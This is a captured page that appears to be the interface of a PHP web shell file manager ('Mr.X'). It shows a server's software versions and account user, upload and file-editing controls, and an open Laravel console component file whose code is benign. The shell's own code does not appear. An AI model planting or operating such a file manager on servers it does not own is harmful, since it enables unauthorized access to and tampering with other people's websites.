🤩 File Manager - Mr.X
PHP:
8.3.33
Server:
Apache
OS:
Linux 5.14.0-611.49.1.el9_7.x86_64
User:
websparkit
Navigate
Upload:
Upload
New File
New Folder
Editing:Ask.php
<?php namespace Illuminate\Console\View\Components; use Symfony\Component\Console\Question\Question; class Ask extends Component { /** * Renders the component using the given arguments. * * @param string $question * @param string|null $default * @param bool $multiline * @return mixed */ public function render($question, $default = null, $multiline = false) { return $this->usingQuestionHelper( fn () => $this->output->askQuestion( (new Question($question, $default)) ->setMultiline($multiline) ) ); } }
Save Changes
Cancel
Create New File
Create New Folder